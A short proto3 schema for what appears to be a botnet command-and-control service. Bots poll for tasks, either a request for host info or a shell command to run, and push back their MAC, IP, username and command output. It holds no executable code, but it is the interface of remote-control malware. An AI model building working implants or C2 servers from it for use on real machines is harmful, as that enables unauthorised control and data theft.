syntax = "proto3";
package c2;

message InfoReq {

}
message ExecuteReq {
    string cmd = 1;
}

message Task {
    oneof data {
        InfoReq info = 1;
        ExecuteReq execute = 2;
    }
}

message InfoRes {
    string mac = 1;
    string ip = 2;
    string username = 3;
}

message ExecuteRes {
    bool status = 1;
    string data = 2;
}

message TaskResult {
    BotID bot_id = 1;
    oneof data {
        InfoRes info = 2;
        ExecuteRes execute = 3;
    }
}

message BotID {
    string mac = 1;
    string ip = 2;
    string id = 3;
}

message Empty {
    
}

service TaskService {
    rpc PollTask (BotID) returns (Task);
    rpc PushTaskResult (TaskResult) returns (Empty);
}
